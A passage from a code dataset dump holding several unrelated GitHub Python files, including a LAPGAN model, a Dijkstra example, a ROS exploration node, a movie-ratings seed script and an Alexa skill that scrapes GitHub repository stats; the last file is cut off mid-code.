self.discriminator(x1=self.x2_diff, x2=self.x2_coarse, y=self.y, scale=16, reuse=True)\n\n g3 = self.generator(x=None, y=self.y, z=self.z[2], scale=8)\n d3_fake = self.discriminator(x1=g3, x2=None, y=self.y, scale=8)\n d3_real = self.discriminator(x1=self.x3_fine, x2=None, y=self.y, scale=8, reuse=True)\n\n self.g = [g1, g2, g3]\n self.d_reals = [d1_real, d2_real, d3_real]\n self.d_fakes = [d1_fake, d2_fake, d3_fake]\n\n # Prob\n m_sigmoid = lambda x: tf.reduce_mean(tf.sigmoid(x))\n with tf.variable_scope('prob'):\n for i in range(len(self.g)):\n self.d_reals_prob.append(m_sigmoid(self.d_reals[i]))\n self.d_fakes_prob.append(m_sigmoid(self.d_fakes[i]))\n\n # Losses\n with tf.variable_scope('loss'):\n for i in range(len(self.g)):\n self.d_loss.append(tf.reduce_mean(sce_loss(self.d_reals[i], tf.ones_like(self.d_reals[i])) +\n sce_loss(self.d_fakes[i], tf.zeros_like(self.d_fakes[i])),\n name=\"d_loss_{0}\".format(i)))\n self.g_loss.append(tf.reduce_mean(sce_loss(self.d_fakes[i], tf.ones_like(self.d_fakes[i])),\n name=\"g_loss_{0}\".format(i)))\n\n # Summary\n for i in range(len(self.g)):\n # tf.summary.scalar('d_real_{0}'.format(i), self.d_reals[i])\n # tf.summary.scalar('d_fake_{0}'.format(i), self.d_fakes[i])\n tf.summary.scalar('d_real_prob_{0}'.format(i), self.d_reals_prob[i])\n tf.summary.scalar('d_fake_prob_{0}'.format(i), self.d_fakes_prob[i])\n tf.summary.scalar('d_loss_{0}'.format(i), self.d_loss[i])\n tf.summary.scalar('g_loss_{0}'.format(i), self.g_loss[i])\n\n tf.summary.histogram(\"z_{0}\".format(i), self.z[i])\n\n # tf.summary.image(\"g\", g1) # generated image from G model\n\n # Optimizer\n t_vars = tf.trainable_variables()\n for idx, i in enumerate([32, 16, 8]):\n self.d_op.append(tf.train.AdamOptimizer(learning_rate=self.learning_rate,\n beta1=self.beta1, beta2=self.beta2).\n minimize(loss=self.d_loss[idx],\n var_list=[v for v in t_vars if v.name.startswith('discriminator_{0}'.format(i))]))\n self.g_op.append(tf.train.AdamOptimizer(learning_rate=self.learning_rate,\n beta1=self.beta1, beta2=self.beta2).\n minimize(loss=self.g_loss[idx],\n var_list=[v for v in t_vars if v.name.startswith('generator_{0}'.format(i))]))\n\n # Merge summary\n self.merged = tf.summary.merge_all()\n\n # Model Saver\n self.saver = tf.train.Saver(max_to_keep=1)\n self.writer = tf.summary.FileWriter('./model/', self.s.graph)\n","repo_name":"Wedeueis/Projetos","sub_path":"Data Science/Deep Learning/GANs/LAPGAN/lapgan_model.py","file_name":"lapgan_model.py","file_ext":"py","file_size_in_byte":11432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38675825945","text":"import heapq\nfrom collections import namedtuple, defaultdict\n\nNode = namedtuple('Node', ['depth', 'index'])\ndisjoint = float('inf')\n\n\ndef AddAdjacent(heap, adjacency, node):\n row = node.index\n for col in xrange(len(adjacency[row])):\n if adjacency[row][col] == disjoint:\n continue\n depth = node.depth + adjacency[row][col]\n heapq.heappush(heap, Node(depth=depth, index=col))\n\n\ndef FindShortestDistanceBetween(adjacency, a, b):\n visited = defaultdict(lambda: False)\n curr = Node(depth=0, index=a)\n heap = [curr]\n\n while curr.index != b and heap:\n curr = heapq.heappop(heap)\n if visited[curr.index]:\n continue\n visited[curr.index] = True\n AddAdjacent(heap, adjacency, curr)\n if curr.index == b:\n return b.depth\n return disjoint\n","repo_name":"slcjordan/dijkstra_example","sub_path":"dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5076579855","text":"#!/usr/bin/env python\nimport rospy\nimport sys\nfrom map import Map\nfrom edge import Edge\nfrom nav_msgs.srv import GetPlan, GetMap\nfrom nav_msgs.msg import GridCells, OccupancyGrid, Path\nfrom geometry_msgs.msg import Point, Pose, PoseStamped\nfrom priority_queue import PriorityQueue\nfrom std_msgs.msg import Bool\nimport tf\nfrom tf.transformations import euler_from_quaternion\n\nclass Explorer:\n\n def __init__(self):\n \"\"\"\n Class constructor\n \"\"\"\n ### Initialize node, name it 'nav'\n rospy.init_node('explorer')\n #subscribe to target_node\n self.go=rospy.Publisher('/move_base_simple/goal', PoseStamped)\n self.frontier = rospy.Publisher('/path_planner/frontier',GridCells)\n self.centroids = rospy.Publisher('/path_planner/centroids',GridCells)\n self.exploring = rospy.Publisher('/explorer/state',Bool)\n self.request_map()\n\n #init tfLinstener\n self.tfListener=tf.TransformListener()\n\n #initiallizing variables needed\n self.px=0.0\n self.py=0.0\n self.pth=0.0\n\n rospy.sleep(1)\n\n def request_map(self):\n \"\"\"\n Requests the map from the map server.\n :return [OccupancyGrid] The grid if the service call was successful,\n None in case of error.\n \"\"\"\n rospy.loginfo('Explorer: Getting Map')\n rospy.wait_for_service('dynamic_map')\n service=rospy.ServiceProxy('dynamic_map',GetMap)\n self.map=Map(service().map)\n rospy.loginfo('Explorer: Got Map')\n\n def main(self):\n\n while True:\n rospy.loginfo('Explorer: Calculating Frontiers')\n\n c_space=self.map.c_space(2)\n #turn map unkown into edges\n frontiers=c_space.isolate_frontiers()\n #expand and shrink edges\n dilate=frontiers.morph(1)\n erode=dilate.morph(-1)\n if erode:\n rospy.loginfo('Explorer: Finished Exploring!')\n self.map=None\n break\n #turn publish edges to frontier\n self.frontier.publish(erode.to_grid_cells())\n #turn eroded map to Edge object list\n edges=erode.to_edges()\n #add sort edges by size\n edges.sort(key=lambda e: 1/e.size)\n #check if centoid is reachable\n #send pose staped\n rospy.loginfo('Explorer: Sending Edge to Nav')\n rospy.loginfo(edges[0])\n\n\n\n self.go.publish(PoseStamped(pose=Pose(position=self.map.grid_to_world(edges[0].centroid))))\n rospy.loginfo('Explorer: Waiting for Robot to Drive')\n #wait for robot to go to path goal\n rospy.wait_for_message('/explorer/reached',Bool)\n rospy.loginfo('Explorer: Loop Complete Restarting')\n #update map after movement:\n self.request_map()\n\n rospy.loginfo(\"Finished Exploring\")\n self.exploring.publish(Bool(False))\n\n\n def update_odometry(self):\n \"\"\"\n Updates the current pose of the robot.\n This method is a callback bound to a Subscriber.\n :param msg [Odometry] The current odometry information.\n \"\"\"\n (trans,rot)=self.tfListener.lookupTransform('/map','/base_footprint',rospy.Time(0))\n\n self.px=trans[0]\n self.py=trans[1]\n (roll , pitch , yaw) = euler_from_quaternion (rot)\n self.pth = yaw\n\n def run(self):\n \"\"\"\n Runs the node until Ctrl-C is pressed.\n \"\"\"\n rospy.spin()\n\nif __name__ == '__main__':\n planner=Explorer()\n planner.main()\n planner.run()\n","repo_name":"pratprem/RBE3002","sub_path":"rbe3002_lab3/src/nodes/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3980308088","text":"import itertools\n\n\ndef parse_int_string(nputstr=\"\"):\n \"\"\"Return list of integers from comma separated ranges\n \n Modified from http://thoughtsbyclayg.blogspot.com/2008/10/parsing-list-\n of-numbers-in-python.html to return ranges in order specified, rather than\n sorting the entire resulting list\n \n >>> parse_int_string(\"1,4,9-12\")\n [1, 4, 9, 10, 11, 12]\n >>> parse_int_string(\"4,5,1,6\")\n [4, 5, 1, 6]\n >>> parse_int_string(\"4,6-8,1,5,2\")\n [4, 6, 7, 8, 1, 5, 2]\n \"\"\"\n selection = []\n error = \"\"\n invalid = set()\n # tokens are comma seperated values\n tokens = [x.strip() for x in nputstr.split(',')]\n for i in tokens:\n try:\n # typically tokens are plain old integers\n selection.append(int(i))\n except ValueError:\n # if not, then it might be a range\n try:\n token = [int(k.strip()) for k in i.split('-')]\n if len(token) > 1:\n token.sort()\n # we have items seperated by a dash\n # try to build a valid range\n first = token[0]\n last = token[len(token) - 1]\n for x in range(first, last + 1):\n selection.append(x)\n except ValueError:\n # not an int and not a range...\n invalid.add(i)\n # Report invalid tokens before returning valid selection\n if invalid:\n error = \"Invalid range: \" + \" \".join([str(i) for i in invalid])\n # ordered = list(selection)\n # ordered.sort()\n return selection, error\n\n\ndef int_list_to_string(values):\n # from http://stackoverflow.com/questions/4628333/converting-a-list-of-integers-into-range-in-python\n def ranges(i):\n for a, b in itertools.groupby(enumerate(i), lambda x_y: x_y[1] - x_y[0]):\n b = list(b)\n yield b[0][1], b[-1][1]\n\n items = []\n for r in ranges(values):\n if r[0] < r[1]:\n items.append(\"%d-%d\" % (r[0], r[1]))\n else:\n items.append(str(r[0]))\n return \",\".join(items)\n","repo_name":"NOAA-ORR-ERD/MapRoom","sub_path":"maproom/library/textparse.py","file_name":"textparse.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29253032935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 9 13:58:17 2016\n\n@author: kuangyiyun\n\"\"\"\n\n#Exercise 8.1\nitem = ['a', 'b', 'c', 'd', 'e']\n\ndef chop(item):\n del item[0]\n del item[len(item)-1]\n\nchop(item)\nprint (item)\n\ndef middle(item):\n del item[0]\n del item[len(item)-1]\n return item\n \nitem = ['a', 'b', 'c', 'd', 'e']\nprint (middle(item))","repo_name":"kyyeve/Python-for-Informatics-Exercise","sub_path":"Exercise8_1.py","file_name":"Exercise8_1.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74574315025","text":"#!/usr/bin/python\n\n##########################################################################################\n# Program: crop_images.py\n# Purpose: In user's working directory with highlighter image files (*_untrimmed.png),\n# crops images to the right size\n# Author: Wenjie Deng\n# Date: 2023-05-04\n##########################################################################################\n\n\nimport sys, os\nimport argparse\nimport glob\n\n\ndef main(wdir):\n\tprint(\"\\n**** Crop highlighter images ****\\n\")\n\tfor file in glob.glob(os.path.join(wdir, '*_untrimmed.png')):\n\t\tcropfile = file.replace(\"_untrimmed.png\", \".png\")\n\t\tcropcommand = f\"convert -crop +0+150 -crop -0-50 {file} {cropfile}\"\n\t\tprint(cropcommand)\n\t\tos.system(cropcommand)\n\t\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--dir\", help=\"directory to hold input sequence fasta file\", nargs=\"?\", const=1, type=str, default=\".\")\n args = parser.parse_args()\n wdir = args.dir\n\n main(wdir)\n","repo_name":"MullinsLab/phylobook_pipeline","sub_path":"script/crop_images.py","file_name":"crop_images.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74458031184","text":"from ..benchmark_robots.benchmark_robot_registry import BenchmarkRobotRegistry\nfrom ..benchmark_robots.base_benchmark_robot_loader import BaseBenchmarkRobotLoader\nfrom ..benchmark_controllers import franka_controllers\n\nimport numpy as np\n\nfrom typing import Optional\nfrom omni.isaac.franka import Franka\n\n# This class is a singleton, and so it will be shared with the robot_registry that is used in extension.py\nrobot_registry = BenchmarkRobotRegistry()\n\"\"\"\n\nBefore running this script, enable the robot_benchmark extension in the Isaac Sim UI under \"Window->Extensions\".\nOpen \"Robot Benchmark\" from the toolbar and take a look at the drop-down menu. You will be able to select different robots\nand controllers written for those robots. Take note of what is already there.\n\nThen, come back to this example, and set RUN_EXAMPLE=True. This will add options to the drop-down menu. It will create a clone of the\nFranka robot under the name \"Example Robot\" that floats .1 m above the ground.\nIt will also create a controller for any Franka robot under the name \"Example Controller\".\nThis example_controller will be registered under our \"Example Robot\" Franka clone, and under the \"Franka\" robot that already appears in\nthe drop-down menu. The \"Franka\" robot will have this new controller added to its pre-existing list of supported controllers, and the\n\"Example Robot\" will have this controller as its only available controller.\n\n----------------------------\n\nScrolling down, you will see that this python file is written as a script inside an \"if RUN_EXAMPLE==True\" block. This script is always\nrun on the startup of the robot_benchmark extension because it is listed as a python module in \"extension.toml\".\n\nThe same goes for the empty folder \"robot_benchmark/user\".\nThe user should place register any new robots or controllers in the \"robot_benchmark/user\" folder by copying the structure found in this template \n\n-----------------------------\n\nNote that there is further explanation at the bottom of this script that is meant to be read after reading through the script.\n\n\"\"\"\n\nRUN_EXAMPLE = False\n\n# Here we create a RobotLoader that we can register in the robot_registry to have it become discoverable by the robot_benchmark extension\n\n\nclass ExampleRobotLoader(BaseBenchmarkRobotLoader):\n def __init__(self, name, **robot_kwargs):\n BaseBenchmarkRobotLoader.__init__(self, name, **robot_kwargs)\n\n # This is redundant with BaseBenchmarkRobotLoader.__init__ and is written here for clarity\n self._robot_kwargs = robot_kwargs\n\n # This is specific to this particular BaseBenchmarkRobotLoader\n self._articulation = None\n\n def load_robot(\n self,\n prim_path: str,\n name: str = \"Franka\",\n usd_path: Optional[str] = None,\n position: Optional[np.ndarray] = None,\n orientation: Optional[np.ndarray] = None,\n ):\n \"\"\"\n The optional arguments after name are not explicitly passed to the load_robot function. They are provided in the \n __init__() function to the ExampleRobotLoader class. They are listed as optional arguments here for clarity to show\n what some of the robot_kwargs may be for this specific load_function.\n \"\"\"\n\n self._articulation = Franka(prim_path, name, **self._robot_kwargs)\n\n return self._articulation\n\n def get_robot_articulation(self):\n return self._articulation\n\n # Other functions used in this example are already implemented in the BaseBenchmarkRobotLoader class.\n # See omni.isaac.robot_benchmark.benchmark_robots.base_benchmark_robot_loader.py for documentation\n\n\nif RUN_EXAMPLE:\n\n \"\"\"\n To make our example robot appear on the drop-down menu, we need to register it.\n Note that we can write the kwargs that we want to pass to the ExampleRobotLoader.load_robot() function \n when we register the robot. In this case, the Example Robot is set to float .1 m above the ground.\n \"\"\"\n\n # print(robot_registry.get_robot_options()) -> prints [\"Franka\"]\n\n example_robot_loader = ExampleRobotLoader(\n \"Example Robot\", position=np.array([0, 0, 0.1])\n ) # This string is the name of the robot in the benchmark log headers\n robot_registry.register_robot(\n \"Example Robot\", example_robot_loader\n ) # This string is the name of the robot as it appears in the drop-down menu\n\n # print(robot_registry.get_robot_options()) -> prints [\"Franka\", \"Example Robot\"]\n\n \"\"\"\n This is how you add a controller an existing robot\n \"\"\"\n\n def example_controller_load_fun(**kwargs):\n # Implement a controller that fulfills the robot_benchmark.benchmark_controllers.base_benchmark_controller interface\n controller = franka_controllers.RMPFlowBenchmarkController(\n kwargs[\"controller_name\"], kwargs[\"robot_loader\"].get_robot_articulation()\n )\n return controller\n\n # This gets the Franka robot loader that is already registered in the robot registry. We can now register our example controller with the Franka\n franka_loader = robot_registry.get_robot_loader(\"Franka\")\n franka_loader.register_controller(\n \"Example Controller\",\n example_controller_load_fun,\n controller_name=\"Example Controller\",\n robot_loader=franka_loader,\n )\n\n # Add the controller to our example robot:\n example_robot_loader.register_controller(\n \"Example Controller\",\n example_controller_load_fun,\n controller_name=\"Example Controller\",\n robot_loader=example_robot_loader,\n )\n\n\n\"\"\"\nYou may be wondering a few things about this example script:\n\nWhat is a RobotLoader, and why is it necessary?\n A RobotLoader exists so that you can register a robot without initializing it until the correct moment.\n Isaac Sim has a few annoying properties around Articulations. When you load an Articulation, it gets added to \n the USD stage. You have to do this BEFORE pressing \"play\". But if you try to initialize the Articulation with \n Articulation.initialize() (which is necessary to control the robot), it will fail with confusing errors unless \"play\"\n has already been pressed. \n \n By filling in a BaseBenchmarkRobotLoader interface, the robot_benchmark extension takes care of timing these things \n appropriately. Additionally, you can write many robot_loaders, but only the robot_loader that is selected in the \n drop-down menu will actually place a robot on the stage. \n\nWhy is the controller registered the way it is? \n The controller is registered with a function to be called later because, once again, the timing needs to be correct to\n have everything get initialized without errors. In robot_benchmark.py, the controller load_function is called\n after the robot Articulation has been initialized. This structure allows for multiple controllers to be written for a robot,\n but only one controller will ever be initialized at a time.\n \n When writing a load_function for a controller, you may take in kwargs that you supply to the register_controller() function.\n These kwargs are stored internally to be passed along later when the load function is called. \n \n Notice in the example_controller_load_fun that one kwarg was the robot_loader object. \n The RMPFlow controller requires an initialized robot Articulation object to function. It would fail if,\n instead of passing the robot_loader as a kwarg, we passed an argument \"robot_articulation = robot_loader.get_robot_articulation()\".\n This is because at the time this script is run, robot_loader.get_robot_articulation() returns None because the robot \n has not been loaded yet. But, by the time that robot_benchmark.py calls the controller_load_function, the robot Articulation\n will have been initialized.\n\nWhat do you mean when you mention logs in robot_benchmark.py?\n When robot_benchmark is initialized, it can be set to log data to a json file. This is pointless when running it from the UI, but\n there is a provided standalone script for running the (environment,robot,policy) pairs of your choice with data logging. See the \n top of the standalone_benchmark_runner.py script for a more detailed explanation.\n\"\"\"\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.robot_benchmark/omni/isaac/robot_benchmark/user_template/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11066795595","text":"import model\nimport csv\nimport datetime\n\n# open a file\n# read a line\n# parse a line\n# create an object\n# add the object to a session\n# commit\n# repeat until done\n\ndef load_users(session):\n # use u.user\n # id|age|gender|occupation|zipcode\n # 1|24|M|technician|85711\n with open('seed_data/u.user', 'rb') as f:\n reader = csv.reader(f, delimiter='|')\n for row in reader:\n new_user = model.User(age=int(row[1]), gender=row[2], zipcode=row[4])\n\n session.add(new_user)\n \n session.commit()\n\ndef load_movies(session):\n # use u.item\n with open('seed_data/u.item', 'rb') as f:\n reader = csv.reader(f, delimiter = \"|\")\n for row in reader:\n date_string = row[2]\n if date_string != \"\":\n pattern = \"%d-%b-%Y\"\n formatted_date = datetime.datetime.strptime(date_string, pattern)\n\n new_movie = model.Movies(name=row[1].decode(\"latin-1\"), released_at=formatted_date, imdb_url=row[4])\n\n session.add(new_movie)\n\n session.commit()\n\ndef load_ratings(session):\n # use u.data\n with open('seed_data/u.data', 'rb') as f:\n reader = csv.reader(f, delimiter = \"\\t\")\n for row in reader:\n new_rating = model.Ratings(user_id=row[0], movie_id=row[1], rating=row[2])\n\n session.add(new_rating)\n\n session.commit()\n\n\ndef main(session):\n # You'll call each of the load_* functions with the session as an argument\n load_users(session)\n load_movies(session)\n load_ratings(session)\n\nif __name__ == \"__main__\":\n s = model.connect()\n main(s)\n","repo_name":"rrude/Ratings_SQLAlchemy","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70788864785","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nimport urllib, json, time, urllib2\nfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n # 'card': {\n # 'type' : 'Simple',\n # 'title': title,\n # 'content': output\n # },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\ndef continue_dialog(sessionAttributes):\n \n message = {}\n message['shouldEndSession'] = False\n message['directives'] = [{'type': 'Dialog.Delegate'}]\n \n return build_response(sessionAttributes, message)\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the Amazon Alexa GitHub Skills Kit. \" \\\n \"Please tell me your username by saying link to Username, \" \\\n \"and then follow the voice guide.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please tell me your username by saying link to Username, \" \\\n \"and then follow the voice guide.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Amazon Alexa GitHub Skills Kit. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \n\ndef outputTryAgain(session) :\n '''\n Ask the user to try again\n '''\n sessionAttributes = session['attributes']\n card_title = \"Try again\"\n speech_output = \"Please try again. I failed to catch you.\"\n\n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \ndef openGitHub() :\n '''\n Ask the user for the user name\n '''\n card_title = \"Personalise your experience\"\n speech_output = \"Please enter your Username \"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getUsername(intent, session) :\n '''\n Parse the user name entered by the user\n '''\n session_attributes = {}\n\n session_attributes['username'] = intent['slots']['username']['value']\n card_title = \"Username\"\n speech_output = \"Thanks! We are now linked to :\" + session_attributes['username'] + \\\n \". Please mention the service you want to use by saying commit/issue/pull requests/forks/stars.\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getCommit(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Commit to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['date'] = intent_request['intent']['slots']['date']['value']\n speech_output = \"For which repo you want to see the commit\"\n \n sessionAttributes['work'] = \"commits\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getIssue(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Issue to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['repo'] = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + sessionAttributes['repo'])\n soup = BeautifulSoup(html.read())\n \n page_nav = soup.find(\"nav\", {\"class\" : \"reponav js-repo-nav js-sidenav-container-pjax container\"})\n spans = page_nav.find_all(\"span\", {\"class\" : \"Counter\"})\n \n num_issues = spans[0].get_text()\n \n speech_output = \"There are \" + str(num_issues) + \" issue(s) for \" + sessionAttributes['repo']\n \n sessionAttributes['work'] = \"issues\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getPullRequest(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Pull request to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['repo'] = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + sessionAttributes['repo'])\n soup = BeautifulSoup(html.read())\n \n page_nav = soup.find(\"nav\", {\"class\" : \"reponav js-repo-nav js-sidenav-container-pjax container\"})\n spans = page_nav.find_all(\"span\", {\"class\" : \"Counter\"})\n \n num_pull_request = spans[1].get_text()\n \n speech_output = \"There are \" + str(num_pull_request) + \" pull request(s) for \" + sessionAttributes['repo']\n \n sessionAttributes['work'] = \"Pull request\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getRepository(intent, session) : \n ''' \n Check for the commit on the specified date\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Repo scraper\"\n # speech_output = \"This part is currently under construction... Sorry for Inconvenience\"\n repo_name = intent['slots']['repository']['value']\n \n git_repo_link = \"https://www.github.com/\" + sessionAttributes['username'] + \"/\" + repo_name + \"/\" + sessionAttributes['work'] + \"/master\"\n \n speech_output = \"Please go through this link to see the \" + sessionAttributes['work'] + \" : \" + git_repo_link\n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getForks(intent_request, session) :\n '''\n This function returns the number of forks for the user asked repo\n '''\n sessionAttributes = session['attributes']\n card_title = \"Forks\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n repo_name = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + repo_name)\n soup = BeautifulSoup(html.read())\n \n page_head = soup.find(\"ul\", {\"class\" : \"pagehead-actions\"})\n \n i = 2 ## for forks\n page_head_li = page_head.find_all(\"li\")\n page_head_li[i] = page_head_li[i].get_text()\n page_head_li[i] = str(page_head_li[i])\n page_head_li[i] = page_head_li[i].replace(\" \", \"\")\n page_head_li[i] = page_head_li[i].replace(\"\\n\", \"\")\n\n num_forks = page_head_li[i][4 :]\n \n speech_output = \"There are \" + str(num_forks) + \" fork(s) for \" + str(repo_name)\n # print(soup)\n \n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \n\ndef getStars(intent_request, session) :\n '''\n This function returns the number of forks for the user asked repo\n '''\n sessionAttributes = session['attributes']\n card_title = \"Stars\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n repo_name = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + repo_name)\n soup = BeautifulSoup(html.read())\n \n \n page_head = soup.find(\"ul\", {\"class\" : \"pagehead-actions\"})\n \n i = 1 ## for stars\n page_head_li = page_head.find_all(\"li\")\n page_head_li[i] = page_head_li[i].get_text()\n page_head_li[i] = str(page_head_li[i])\n page_head_li[i] = page_head_li[i].replace(\" \", \"\")\n page_head_li[i] = page_head_li[i].replace(\"\\n\", \"\")\n\n \n num_stars = page_head_li[i][4 :]\n \n speech_output = \"There are \" + str(num_stars) + \" star(s) for \" + str(repo_name)\n # print(soup)\n \n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n \n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n \n try :\n # Dispatch to your skill's intent handlers\n if intent_name == \"opengithub\":\n return openGitHub()\n if intent_name == \"usernameInput\":\n return getUsername(intent, session)\n elif intent_name == \"commit\":\n return getCommit(intent_request, session)\n elif intent_name == \"issue\" :\n return getIssue(intent_request, session)\n elif intent_name == \"pullrequest\" :\n return getPullRequest(intent_request, session)\n elif intent_name == \"repositoryName\":\n return getRepository(intent, session)\n elif intent_name == \"forks\" :\n return getForks(intent_request, session)\n elif intent_name == \"stars\" :\n return getStars(intent_request, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n except :\n return outputTryAgain(session)\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return 